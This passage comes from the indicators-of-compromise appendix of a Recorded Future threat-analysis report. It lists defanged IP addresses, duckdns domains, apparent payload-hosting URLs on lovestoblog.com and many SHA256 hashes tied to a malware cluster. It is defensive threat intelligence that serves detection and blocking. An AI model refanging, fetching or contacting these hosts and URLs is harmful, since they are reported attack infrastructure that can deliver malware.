Addresses:\r\n45[.]133[.]180[.]162\r\n46[.]246[.]4[.]3\r\n46[.]246[.]4[.]9\r\n46[.]246[.]4[.]17\r\n46[.]246[.]4[.]19\r\n46[.]246[.]6[.]4\r\n46[.]246[.]6[.]5\r\n46[.]246[.]6[.]13\r\n46[.]246[.]6[.]20\r\n46[.]246[.]12[.]2\r\n46[.]246[.]12[.]3\r\n46[.]246[.]14[.]2\r\n46[.]246[.]14[.]4\r\n46[.]246[.]14[.]5\r\n46[.]246[.]14[.]7\r\n46[.]246[.]14[.]15\r\n46[.]246[.]14[.]17\r\n46[.]246[.]14[.]21\r\n46[.]246[.]80[.]3\r\n46[.]246[.]80[.]16\r\n46[.]246[.]82[.]9\r\n46[.]246[.]82[.]11\r\n46[.]246[.]82[.]12\r\n46[.]246[.]82[.]16\r\n46[.]246[.]82[.]17\r\n46[.]246[.]82[.]18\r\n46[.]246[.]82[.]19\r\n46[.]246[.]84[.]5\r\n46[.]246[.]84[.]7\r\n46[.]246[.]84[.]10\r\n46[.]246[.]84[.]15\r\n46[.]246[.]84[.]18\r\n46[.]246[.]86[.]4\r\n46[.]246[.]86[.]5\r\n46[.]246[.]86[.]16\r\n46[.]246[.]86[.]18\r\n178[.]73[.]192[.]3\r\n178[.]73[.]192[.]8\r\n178[.]73[.]192[.]12\r\n178[.]73[.]192[.]18\r\n \r\n33 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n178[.]73[.]218[.]2\r\n178[.]73[.]218[.]7\r\n178[.]73[.]218[.]12\r\n178[.]73[.]218[.]13\r\n178[.]73[.]218[.]17\r\n188[.]126[.]90[.]2\r\n188[.]126[.]90[.]4\r\n188[.]126[.]90[.]9\r\n188[.]126[.]90[.]15\r\n188[.]126[.]90[.]20\r\n \r\nCluster 5 Domains:\r\n2seguro2025[.]duckdns[.]org\r\nansy10jun[.]duckdns[.]org\r\nansy1703[.]duckdns[.]org\r\nasegurar2octubre[.]duckdns[.]org\r\nasegurar3octubre[.]duckdns[.]org\r\nbb2023[.]duckdns[.]org\r\ndcabril[.]duckdns[.]org\r\ngotemburgoxm[.]duckdns[.]org\r\nromanovas[.]duckdns[.]org\r\n \r\nURLs:\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_e1502b7358874d6086b38a71038423c2[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_fb2497d842454850a250bf600d899709[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_175c782b52a345e9b408a8449e64f766[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_4ca2665d006b45ec95526f844b1bb6f7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_7d71280008c9462aa54e84600eb9ee6d[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_827908fb62d34a0b988508c8e9333b4a[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_a5260fdbc31b44af9df4b09d3f369843[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ad30f08ca19f483ba511f63ef3d15dd3[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_b476d1da5ee74acb9f4973c91df6852b[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_c9ad47e108e64053a72ec0b686a39a96[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_caf7a77031444a62880f2392b32c04d7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_d8bd099bf2e64e0bbf252e7b31459507[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ddca1f50d908428fa2aba69de178a2ae[.]txt\r\n \r\nSHA256 Hashes:\r\n0242cb2f175959083d6e335291a6010810adea229262638b4c4519b73a0235e1\r\n02c4dc743727fc80a96de9949ff6c70311359681e04ae569a8416e235025de62\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899\r\n05869e6f626ef7a1638b89d0b95fc5c74f8dd4e794da18170f9fab3c5837f97f\r\n0648201ff2ff9fd17389046da374d2df92bab623e52016c2502604a1c9acab60\r\n068a73b181fb2018e45d5740d84c4951aab9208efe3dc2affc4be9a98e30a36d\r\n0729eb04a031abe19ff9a06cc85f5d634fb519cc1c4572552cda2279fd41598d\r\n08f5d691d0bda5a166789bc7544258713752fb2d0349a3440fde1e2754cb1511\r\n09906220a031d47b63209142dae794c1823d413450641d06a96086e80487d648\r\n0a81caad21e4cba59297617001902807e5ec3f97bf0eb7061da9e473aaa73cf6\r\n0af4ff2ba05c033fc79f75d349aa4219e311f9dbbb7b1c6b653c0b7f196b4ae3\r\n0b80cf85d6c8ac7ef2c3f133db86ff11eb0f3e94d579d40c70c1f8a26e395af3\r\n0b8d9cf2c5e7185b13d65c3d442800005ba741cc03fa7ba09c969b63855ad851\r\n0bb560a3de9032a34f50ffaf900d69a060ff858295fca93f2e00c99de4f5317f\r\n0bd12552db5235ed9ee92a1c8bd4779070cef15a4dc8992bc06cfcec81cd9e7d\r\n0c0e3db172d6bebd207ef644014b3189fc4743a8ae82326e662218ad041926fd\r\n0e0195998fe478bbfc06a28706f21ae830f15765995cad680b955baf23eb9b86\r\n0e5a768a611a4d0ed7cb984b2ee790ad419c6ce0be68c341a2d4f64c531d8122\r\n0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1\r\n1039d25f6a62b5d00c636bd77bf72058bc20ef21f4ca41c38ae6fe404b2d5359\r\n117d0c3fed7afe29a633ef9ae9a7ce91b07d42f0dfee74623339f55d539ccfe9\r\n1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81\r\n \r\n34 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n1311b0d5a434cd5eea9622e4eb01de6546cb147f70807c15f95070c565147837\r\n13e9e508c4a67f7c026a0c3edcd604a445d66454044c5d74ba2e4f31fa26c0a5\r\n14bf934d99de4db93cdf536ef2ab1e5b8e5a0c0eed98a25904672de5d110059e\r\n15083899111221e370e7c2f45b19f23fd88ca40d3f1c2c6d19324fd6414c609e\r\n1d26170ba16131f0321cf65e19a0ce4acfc7d5dc7cb8b020431019eaf5f888e8\r\n1da1eabae5779e22e59d82a7f46e4b940aff525a33254624de9ee320ac54dd99\r\n1e850dc9786d670c97ed064b1af87aab966be58d80051476918b0183b0069b3a\r\n20e7dfbd5c7c54d29427ad3868ffe0e833e24f795387b118143c0b613bf5fac1\r\n21aa261a83bd6d2b435ff38d3411c82bc7fa91b82adac99eb5c2153ac34f30e3\r\n239bcf64fc9d0b5dbcd7e1351444244695bd530e510846e0bb91055ca2e97ed1\r\n272eef21aa697cc7925fa303fe3aecb578cf2f572c7501a9eb2d944849dfe46c\r\n277d6e7900cfef05715f9a79f0af411e37dbd37c91590836ffb4af821a708f66\r\n27b3d1c60757aaef5baf68864dd9dc9cceb6b688be4c5ad7cfc1670035789f3e\r\n27d35c0be9120154906cb612565f02998c5fc9f7cdcd790b92c8f5a6e1bf6396\r\n27f03ad67e31c0e25e979c905629b80d98867e8e542cfabaa8a8be581a85aa37\r\n2851dc29c6a6abc8688b730b70ff9cb8f5e63facb71057fa600201c15877ca84\r\n28afc5b80ede7c040ec56b093f3748c7eb29db220901d720380eb07cf3eeb294\r\n297dcbc929793df0237cf7e5d78945873add6d6851e890339a45878a4e3ddb74\r\n2a2e92fc86be8adf429e4172368dfacd3fd0c157d0f602d713acf82c89932edf\r\n2b0314caa8db6210c626bcd9773c0d3c848a05721c49024b3bffd34b8a21724b\r\n2cc8aa53e3e30f1c09950e4ae1262f8df3588b8e31775318ef951fd994b5b918\r\n2d4db0e8a6a2dfa3806696d22f25bcb9cd25dae881a248d6746c306a7ca0bc7a\r\n2e82689cc5a2d9beb0bce4da3330122e5cad896a04b1296c5fb9b54fe3e92f52\r\n2fc4aaeaf8eba6c4d8cc4622ac7693c65cd3cec421f611b43dd252c18816e551\r\n302134f47d1724a2b3c6e06e53831caf2ac86cc9b94f470c8f8641b1cb4026f0\r\n319a560130015fa1c53149234321ba5313e5a93f06de6675f5da4a8c2dfa1cf1\r\n31a5729f1bcb928bab9a9606e4f3c3d12012332a633eb3fa1d26c014917f891b\r\n31f58aa1dd25b7a341e4de125ef6adc4268af4a97501bf0882adb7af244773f7\r\n32b8929c4bf6ce8f74c470b6f1aff0be75ae9ca7df66ace39f2a849095427a73\r\n3378b49278032fcabc8f4b4e6622eb87cffba645987b1f81161905452aef175a\r\n33fddd6a9d4bece9be47be6d623da228e4cb69f5c51aaf61ffb75c803957396d\r\n359eac88704e65913b7331affecd4ca911b52f000e68599f24af96d6ad71b82f\r\n370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93\r\n38019ee88bba4b4ceb159643c5a2a2608b628ef673e7ab7516ef47f6f6230618\r\n3a625c677ba81aa0639129c07cf7991e39be78e9e1b23bb31005e75c19de8580\r\n3c2940ad16f414f884e8c6f90c1f36a313f9982152b9aa8d355282ee7bc81a9b\r\n3ce0428f9fe958fb6cecbf7bfe8cdb719550a1a3a5b2303686c696bc21c82f78\r\n40714eff62e3c9f7b7588a56cbcaa115a800c6b336de2a82f87d2544ab2daf69\r\n44284652527348f428112ea6eb564103d72edd650e3d0c831ad91043c99d5ffc\r\n4442b45bc6cca253a7a53a1b2a872df3867b898403ef0d2c3a8cf5687f615aed\r\n44ea4a98e1ac0e0d4c7063992f562cc893b8ff4da7fe72868b3fe487c061dbb0\r\n45185844b576c28810d12c849fde05cd6bd23900ca97394f81a98b7872490ad0\r\n4564bdb245c4e6248d78aaea7b588ad3faa79514e7662b80525578dc615e07b5\r\n4776dd03944a13cd756ab7fb4ac979fab7eb6ff92f5f23e4138a06a2aeec9581\r\n4790e32d8b33b9cf719d84a83eaf2a5d953d0a9dc22843276ee343d60f1b7565\r\n47a2313df0d0a74c1be649d04236dd10b48693a5da0db30335d77371f4ae7fac\r\n49ccc8aa8b6e505207743cc172193f948aaa236304018da0bf0d2ccfd8c0e985\r\n4a812c47b5b4d7b2e383cde74fa61bb49685f0820c88d570ff6a921e631b5926\r\n4becc5d800d9851cc25fd09c848e834d019c2f57ec7bbb513d03eac6e4344287\r\n4e1597543c0d63cf44db982f9c5cdb0ebdb88343ab8e8711501103d5f2ebb06b\r\n4ef47b3e56af3742a6f8389f126ed14a2114ff2e8dbf7118511cf62cd0d8bd79\r\n4f6d6abe27b5e7e9aa55ada51b521e8fe715c6c0bf4bd2e2838c9c85f543f719\r\n4f6fdc5d3b90b760670a2545ed96e8eed348ce2c0fae37058fd7318df17cba07\r\n4fc1890df01994a7163f1605c8cb2a660531cb9e6cf3d05622d97791df337aa3\r\n508176ecdbf35360d23083f25c762493a2ebbca1d4cebcd5953b00d1e1be0741\r\n50bde48b7037890d318cf123e23a78f734634cff29354fc5852293d5702737b9\r\n52ad9c51a0d0ac35f7934e85770ed32de61f214b7551fd5310f1a342e154309b\r\n53e52d8dd95c09616022e09d7b94901e2f5189c258438cc910ab19760bf36da3\r\n56e66a73d0ec0ef032b8fc157ef65f38d97476066b4a5cab88ad036fc25e8634\r\n593a1b142fc855ad10cbc84e107d3a2cd248e88749658af8f6f656095f6f883a\r\n \r\n35 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n5b8aa9408ee3d18a803df688974bfc125b110db19349e1938ac8d3bb6a966fcc\r\n5bfedb358b5ebe7db6793dfb87885fd08d547cdea786659654bc717c98825a00\r\n5c51dc904076cd5dc22fec10fa18563ef5283ebcfeec6f4bdc23a7504f1d5838\r\n5d75ad8822f8149ddc84f1148ac011b9c39a7979a611bfe2bc8c2090e4d54728\r\n5e07c2f16fe5b2d60c4daba73c31f298b2fba618d329e57ba806c19a7663cfda\r\n6073590a4b09dcd26e35a6c831691e537736a292a7cc5bd668b07dbbf1000415\r\n60ff5136bfcef60a83320eef711bce7f41a0447f95568d09e908a49f351344da\r\n6140a9a1ffaf120d6f33097c1f8bfdcac83db5d883451a073f0cf2524fb1996d\r\n61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa\r\n627d051af3b66b3ba4337c688250f2621abc9f3b4cf1434e10654ada10887881\r\n62c0672bd77beaab3e5546944e23f7db1f66a207d9eecbedcaaebb4bfc47b954\r\n636acb2498b3cc5a455badd95e1839edbd84d46b18af80e1f5c4efe6cf573c3c\r\n64a4287f7973fdb7a9030679dda5b1d175d34c568910282dd532dffc45af6e9c\r\n657e021f0dfdd8c628a428a824da278d14d674aefd248f86a58f5bbe4472f0dc\r\n666f8ba7a9704f98ae74481fab1ce77c3256bad31d22206c5cdf9cb1009c4b2e\r\n6849da9fb64c3db1e883aa1a106a03c8e69d3e41d4be8a81bafbdd78f2f311da\r\n690c8ee15e2bae3050b1ba813e4b7fbd8ee93d9b7132745aec345372322d69fc\r\n6cac0e0c1836de13434a251e8c792b459ba4e573023be0472898a26fdeef3f20\r\n6cae1f2c96d112062e571dc8b6152d742ba9358992114703c14b5fc37835f896\r\n6d41b3409dbdabdc5109f72b190e2a54ed82b2cbb15951ac077343b2b0e81241\r\n6d4a557b0c436b278bf484d9aed2daffa66c105c9056e6156216a6f224c086c2\r\n6d540d76f627bc97929b77e2f613ff641be0810332505b010164f38940d0120b\r\n6dc49027dcfc978c4533c46bc9b37a39c7038a347ae5bb5535439517b2075bfc\r\n6df21a64f5b80d9e214a721e2025510fcd29ca191f8ff39386e07b15e06afd95\r\n6e7d32278271b077912779e2ef7f5aac3246578393ad93024c2211a86380b208\r\n702e912dac9885a2a74094d14b5c312d979aa86412f5fe6b612ea2bc0445a572\r\n705ea94689cc1507c6ee13bc2e8d54bde154a4a9880e2c1049f4036b9671631a\r\n708924eabf4e730a1eaa5e2db2ab6d483458370763efebdd31d25fc95c04945a\r\n71153a5e57cf77267bfef881faaf3575068c79fee2cd9165252d5e885bc9e5a3\r\n73c28224eca789607d77884620425d0fad56ef7591d6cda5f384a49d19beb5c7\r\n75001105ab3d7363f619f77a3a4a8a62422f9b28ae299a06c34b9bc474610e7f\r\n7652a17de2e02c57fd7a20cb690fec60e63f4223e6d990375737e93579e92957\r\n77128fae0b6acdbc56ece8ba39015d42fc561794d8ecd1cbba8d9c423ad99439\r\n7748317f687fe8cb70e0d48d528223d8737b462235837e6beefab6f28e553ffb\r\n78f4cd376fa2eb034e90790c5f963d0439251e2425c86ae64fc43e4e2509d75a\r\n7909978dc2c58e00379f31c8fd34f15b56ec714c3cf0a5804c7b164d15cbeaf3\r\n79512c2ddc11fb9d9f95f7e6fbacbb91db53362ce6799cf89d870683e63f4605\r\n7a635c5189632764d900111b53fb26f88e2c7bac46bd5c38ad51ac7fe962ab48\r\n7b9da4885838c16faf069a1b0f29ce6560ca8c65ad60f70f8c8f77ab2f2df4fa\r\n7c02f8bc0d327a8f061be14476004aa13e78bb348dbbb9e1eb1a255e9edd3f8e\r\n7cb8124af5c9942809588851783438f25b4a79224c63c0d3a2568a662706334f\r\n7cfe415ee93c8a321d7f90315ca3f70629fda89c6e4acbde87ee1abd65cdb25e\r\n7dd67fdd9eba6f4093979ee73f01e9c29231530ea73acc90948fcffce17f8d5d\r\n7e0f17ee075fa068cf0ff0751d7e1f9c2512628f20248cfe93f742fc1d3d60aa\r\n7eaaf8ac1097ba3bcaf0f9cd166e5ed10e6ae16d04a78ff227bb6c584316f01e\r\n7f206ec690f881a7939406e51f1df454bb55a0fa6cd8c0892b05dd7249ab3db8\r\n7f4949366003ad5c97543d39a3457d91922c489dd929038a764fe6cc5c410604\r\n8069dc3a01b238d5506448abd7cddb3a7c583b81b209e516481b2923aac90782\r\n80a8c38c435b42fb1a5b77d85da369ca40b7d4206cc936f04732c4eb3527ae07\r\n80ba2478e4695de6db6ee1bed092eab38cc6c4243f3ba6e6a16ca180a68520ed\r\n80fe3676d482c19e5909ca6d4dc014f2f46504dd7c0b48fad5a56d0060958abb\r\n82556970b87adf24162bdea13611a0206e2d2d6ec1020da29317bfe5c7b51de9\r\n82b733a36bbbfb27d602e728314398c6db1b5ce3d37aa584c50cdf625fd949bb\r\n842b97229574ce1ca55415fd20a80dc29f1b35b8776a8d482bb5997b53b6f26f\r\n84ec8e3181e19f5c492ed3c43cf69e74ca7ef109b535b7b82143ba9b2d59442f\r\n84f4733b7eaeea866b3f35e932f25713f621817c79f0096c9da22a3973430286\r\n85cc9928363eb10ed90785a217d5f51e37a22efa4a7f30bdb8bc82ab2fa1267e\r\n86bad37b00f1e0b3c38bed9a6f6995fa332761a1bb1e826a0708ab80ddfe6a8b\r\n88490dc46e9e631c09526cdfd0ffdc6ae7be26bb35e58903ca52973e7d0e34cf\r\n8944005cc7ce00627022ebff406c65e780bb87fd56a2bed8db91585867a50346\r\n \r\n36 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n899ce743d330882aa2f28d6a6ed6c3def3e409d8b20149b0161716e104fdd7ea\r\n89cbc0a596623b035e90dd76cdd27aca583edda8d64e7174b2a4fcd6829b42fb\r\n8a7bd4d6832c72f8fdfeb1eb7cf8c89107c9ec617b875a62e659f12da2acc3d1\r\n8aa26ab75ad89a6eebadb7f1da170f62ff81abcfe44afb5fca2ae1d2dc0b9e1a\r\n8b0a8fb7c648e80397067ecd714092d9904c6d8625f67aa1aef2dc864891ab43\r\n8f61b17b3528fc2e4a5d7fa647b7aa86e7653f98a90fa5e2e08b0ed51e69de3a\r\n8f7245f0797164e14902ede0ccb4055452b3fd293559d5e652724d33ac2f381b\r\n8f972b2fba44198800333d8f7d9b9b1daac3c0d4693481ca8ac8f6cab4af989f\r\n904f1f112a522dba3be4fc8412cb240003f8c5772014ad7233092bbd8e4e268c\r\n91c63ebd9c9753eebb6059358e004e9aff0c8bc590a81c8904b2aec5d08a7fa9\r\n9305f79e4ebf3863c9503230744c03bdbe3e5fe65e8fb7e2f29ed6a5081d23b0\r\n9426b4682adaf3a2166a0c92b5b710e3351f102feafc26a0f3f11332ff6ee00e\r\n94d9c1e115024ef099bffddfd7780e1a8a593be41f613a464ee565936c121119\r\n94e3299936f3a8a903f08c04b0579ebede2cb3917e92e727142626c5391bdf3d\r\n95687da203507a11837eaeb29bfe86481828b74b62fc869604b5eaa552f950c2\r\n95b2b415d6b4347fd035db1eec5f979b377bbcf0171b153b1110021bbba6cac3\r\n95e5c56554c9f3a36401a084c7676ed156ab9aa1b9c6bae282b6772de9cc8df8\r\n96a31ddc63bb894c41f389a222e84a48cefa4c117e66e3ef166c36c8a0ae9f19\r\n9704c2c88a3ea50c430b3485dbb5f9374785333bf65a6577fde16fa3e0e4bf48\r\n9945a60ea4f2f1cfdae3ef85ccb74af2ee8b80d84889d3897f6c2a034cccf9c2\r\n999d6e7ce39ca8e9f85ab0f2e53db9e503a765a3c5515f6336c491f153a005d0\r\n9a42050380007f9982c8e59da42c6cba94b30ea12403691886bfc91c38fb92b6\r\n9ab94cafd45dc195625806c133c6a8d411669d69a50e5a9006c841be75539687\r\n9b1d205dc28f1471e09aaa67c3fd10327531e5e5d6590ddc216f03a41cf9b92f\r\n9be19996b731955043513227171aa0a91ed825f1f5616f5a3b94dfeaa1651da7\r\n9c05646d2deb572ac87ad74897905ecaff050173ea2af8dcfd7acf1adea7772f\r\n9ccea0fcf8ba30f933dfcb6e697d46c8bcba0744250cb4420b41d3369e34a6a0\r\n9d3c887b526df1630a1e46bbcdd7148f5d5f2e8c964eec8aaa0b01b294b944d7\r\n9e8b12807c3d7a542cec5bf6a5781a2f6c300938313b1d1e129293a4202035ec\r\na0bce2bd548a9f33da2478ed6841c780d6f0f63fce0be90b89fa189e65762b65\r\na0dee795b9fe96554569c2854167647f630be4399f294dd2cbaf58bb8acb27d6\r\na25e799d14d882edc5754916885011c98d3f5a15ae0b66fbe83a183b0d9a18fb\r\na2b268ad1797615fc174bf71a3000bb48a34ba439289ad62d1734e86a9a638b5\r\na38beba261e6b75233fcf7d0f019644d985b80447d27d5a2d8939d75869121df\r\na3ca3c50a8693d0454d113b9ec34ddb6aab15a6fefea415596ea2535d2364936\r\na3e7b5ecc6ff323ac3e57197cd82aa0cc8ffa07abf3488a804e29c2725e696e0\r\na3fafd76cc487289ee5d259d046ebbaf82ffa71c13e69f3538aec0a7fca593df\r\na45dc0648f247eee9ae3ab15d1eece5907624a1a250feaff7e8ffcff8e04fa1a\r\na47039fa1a8aa88d170890d4c9a12aa356d9adbc845593cc1638c85ba120dc78\r\na5085f9c7304a762e274524b96dfc34f9ca243b479a2472c6e5e5b367f46114e\r\na52e245dd7937094711b10c479274a2cccea2dfb89f7d4c9f22879214718f92b\r\na61b40b09b2c8f714c7cf70a92a9b215cc53cc3962a543b1bef4fc3999a6f6cf\r\na85332e4145ab71582bbfc0f6cff9d24e0aeb2c45c8e69c6af860bf2255c86af\r\na97c3e3513946498242a032992ba05946787ba736facad8e51c192c3ad272713\r\naa7234653c35c44d1f952fc62808f3831f97637acfe1c4e0b1e12a8e291b5f4e\r\naa8b92535e690da968234d639af28caf881f03ad1f4dcad1c692b846830d0d87\r\naab18e256bd738597364a8a91f37b316abe540999ad13f60bfb506f3353d40db\r\naaf3dbfd566b4dc833c0de88435132f4185f589d37211386f799b95722e37a33\r\nab4a471521b43632e071e53f28e15e1b68de8c2b8971b62985e7251bf3382130\r\nab64e78fe74b47890929238bd6c60e55c3c2c0a7f84c76c170f2281417e5da17\r\nadd9a93c013732ec36a6554212d75b7969e46b6dadb55bf82c34d9a5e20a9d1d\r\nae9a36c85c11f5f71596bca8f3b01b49b0175be9d9b1367d09419715edda2b02\r\naee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd\r\naf07986cfaa6184e2888310a493104909ab9eee6f1512a74633331afbd32fee9\r\naf5c473f2f15835d745853d7127769d77f04611efbf792634f6d1f833bd150a2\r\naf891967c363f51bdd6cb33bf9d058f8b98337d1c387ac976e7c568ddb43b641\r\naf9ddb84ff76790fd8f596ff845784abd3464c74bb8b82836ce23189c4b7f183\r\nb08e83b034213d1c4d33e29c63d8d24b99684c2714e29ae3b3aaec34d5c8d134\r\nb219c4089fa80f02dd5ba6b280c0a3794af9cacf7460d090f23a56fb100d558c\r\nb231204b60e0b4e8b462af718964fa54d544a9658225c47e314e3daae0efc0b4\r\n \r\n37 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nb2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864\r\nb2fd262519105fb279e36476380f83068601609492f410d5e700d3a764e2ac36\r\nb315aa63ea29afe35dd51c2382d48bb6de5e1d9166368df00eb2d7750eb747f7\r\nb4491285f2084f070ff3f15c150568d920dcf327600c30b539063981dfcfeee4\r\nb49dfaa0d915524049eb0eed26115dac421cd307551284a054a27cbbdb9aad81\r\nb5739bfbada346770909e8287fe1e2ec45d662d9958355a4aa4f47423118b8e8\r\nb5a44cdcc65c728f7e447eff764905d6bfda4039992b470afe2cc84ce8dcc5f7\r\nb5a6c21c9fc7033418be5efb45746b181551e346ab255feca19fd0d40cbb0942\r\nb633f0a171dbd8b0e06cee74602f9863d4133566cfb56fabfb95e281ffbb6fdb\r\nb6bab712bb3a684b5c7b7e147e5d8ba293e4934ef443ccce3a8914b6d3e28df7\r\nb7688d7428dbcc35afbff30b349adf1a16667e3736c47a9f27a86decf9d1b37e\r\nb78a931beae08692b1368197832e4dcabbfea87f6c362258ea854d4e5658240d\r\nb7d205a1560b07a92d744053744c29823064e2c415a71887fccd8524a3cad3fb\r\nb821057045d27dd6ce8e14dac6e93d42c9ca47ce1e86390c5d2dac0401d28601\r\nb97420f542add6441b0fe7389aaf327a9bbf3cca5174280b6c64de264d2dbd7c\r\nb9a7fba5330cc0d97990178d1c492deddb1f287f21de30c40b0e4e2f47b2be21\r\nb9df7d55692a03d3255e824a37cd53de11c07e51864809ceca01362a56b991d5\r\nba604a46a71d45d0bb3ba3eea9f0faece3d48ba6ff2872778057ce8a0efc0d33\r\nbac96f81c8485c3bd6193bb3451f30feb0e972b780463beba41a9dc1121aa9c4\r\nbbbbc1e8c660d2d8b00d87446e52d3be20da3f4da7c3505e3468ad731eff250e\r\nbd34831c864eadb917c78ad850b9e40685f17dbb1927018ff9d3dbd1f6d57ce1\r\nbd7dcd2e04ece48f19494ef3236127492cf332fdc7f8c4e9931b0a434bd4ffad\r\nbfe2d9f203a8890182df4737119ffbdb91527754bb06e7108415a45b47ad41ef\r\nc0cbee9a428f04a894b71255b869d00e0c2ab06dd1740bfe89338b8c65f8c46d\r\nc10317f74c6f011a71bbb4df80e7b6d4b950de436a2f49effc3e443c4f6920d2\r\nc12239a964eb2a9631f02489464a67d2c0837bb36e32a53cd6bc03301082d79e\r\nc3f5376c06e423482735d896285dd9bcbeee98874075cf47bec41e3448bd2f95\r\nc51e59b60975fd8e8cddac0827068da0c8a4c3928c6105917cdb28b95a7cc551\r\nc63ce128ee4c0442e303b86d27e3e7df8eff15a04a44ada8cabfa965144ccf56\r\nc671155c2ff3529435a4facaabd8a06c6f5e559ff24763d6f387bc818c453727\r\nc69461854c0d9bcf75261e78a94bc1a5f9b8daaf6ec536c7e83b528649f2eb5e\r\nc931b2128f9bdbf85d0914a97dbbe76bb3220d3a402143bd14d1bf32f820214b\r\nc9776da6cafb9537f84841d4e4b1ae8c3a26337c9fee45176881c1d114a63980\r\nc9a017f4180ec82ef8e0d2340d862bdc3d993725b8a3eff0ae15e9d2f00f4e69\r\ncb70a3999672fb0949fcee0898f84346140a79868b0b97503cdf4ce715b86564\r\ncceb4541dcaea1b067bef64943b47653d239ac07d6ee6f50d74832545035e350\r\nce2a7bafbd2a2700a7ba5962f13cf3f85be1f2b93e48d588a4471be122c8340d\r\nd12efa7c95087156cbfdeda07b3c68d7f2d9a31162d952c1dd2e25630e369416\r\nd15e2227283e9f87b19538f1ffe0de9fcf08efa30a9742d3ec7bfb9c7f595837\r\nd1de1db53d364adf0ff850b17ed5269dbf45518608807c554ee29052b4a8fefd\r\nd25df9c7ec360528cf3fd9a88ed04660ba8bec6b35ce2de04fa4d09a9d1666c7\r\nd41678f5dcf883a744c19083458f81ab3876ec71dadb1f81443728a38be3709e\r\nd8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5\r\nd87c126baec640657fed03c6f493c2ad36b5e0f0483149b952e18688ab422276\r\nd8e3821ebb6a4af82f51591ab4a222add7163e2b8d33a642e1ca97bf06aced45\r\ndaa19bc1bbf65c80278076621afb8764b5d258d4b3a7280f6455dde812bc24c3\r\ndb3f21ef54324633b2102bcc127289348fe777382fe5dcb4380eafdfc506fe7b\r\nde162fdd0926b15a321150307806d4597e71395548b572e83bda5cc378743fe0\r\ndf0fe5536a69848a22b1b22f424a9bd598adafb30e09101dc98b214e09a1aef2\r\ndff4319ada078e744497da2f44a594228f2dde3761a0c80ebd5df43e7cc41b85\r\ne006c255d66a4eba50c26fffddda6f415d165a16eff5658413312d05c5f50173\r\ne3e14c713fd8e72e3e37d3e9b2cea2ed7bf70621c7c04263ed7ac6925d817086\r\ne4a3a4a5f88e181089d783f56aec7d2fc2f4647ac12b5de03746f81921097063\r\ne62966578720b4ab47866fbfc00011b72aa2c557fa95f159c42473d5c71261e8\r\ne6e1b9b41e158bbcbc893681e66d90ddc08f3fe7de1f5ba45eb53d4a2577db79\r\ne779571e4f80664738634254eccbf6f32bd51ff64ac4f0080ff43634fe723edb\r\neb3acf4a55cceb591712b83074568acee909a60669054dbeb5f0c0bc464a9ab0\r\nebd0127b3dfdc0dcf24f4a0a269769835d17a8e685193792082b359b843412ff\r\nebed364d453d5109b48ad9e4a12a887b8abc6a738b5030f2ca87d29a4a3b1f87\r\necb0ce4f96a59bf9978986f80709c80090d449ff7605f983e6cf708188600144\r\n \r\n38 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\ned475a5fe53c368a1899fac98a6b88ec863f89ea07b7e571e6f0ec8b060262af\r\nee1a3803936b0f51c8fa1e2ce1fcbfe092f0c2e846d5fd5bb075f3ad931efe6f\r\nee966ef554884cc383b2bd03f39786af388a6712bf9e6facbe466faa1fef0251\r\nf057cf513f34fa8e036010389ab288207810fc14d1230a40f51d9abb2344f1c8\r\nf13be087d76de879d7d05da89aa14df3548b11138ef8943b2d9d11c9dd627133\r\nf1b9bad3c87e18d9abc585e17ccb2f0e3a266006eac12a2a3e1bc180d2f8a435\r\nf3fb0a6c6b3ba744cc8122148efd2943c8602facce97356a4008d67485afb55e\r\nf6caac63455aac9593976bac3fbf28378b89bd00a79fff2fd2563e24adf81ace\r\nf700b67bcdb5539105795c84ff283ccf4140f12a58b82501ad38ad29dc7e9c39\r\nf769521b8f831a9c7a1631dd9633e74cca1c39305ec995a4dbf8a77302ec2948\r\nf95dac0cdd08d1f5fa2e5032cc7a95a87044201c8601198b3860e501098d6549\r\nfa5a9e5bef372869f08e24ecfe8e68b12523f1a02607cd12d5f7f219b7dff8d1\r\nfb66632cd45196cc46dd75ffb02537e72772d6998f39743969bbaa1852362592\r\nfc4b79823478e62b18a49f18d70bbaf768e89e498d64b4c200ee873b1fe6554d\r\nfd665e99f65e34317e5b29b8b7761415317c5831bb91d843a76d477b6df19f15\r\nfd755425f8805b90b8c82ffa9e2d04d274811b7508b08a187b2a41148ad92a9a\r\nfd7a64d15e03608d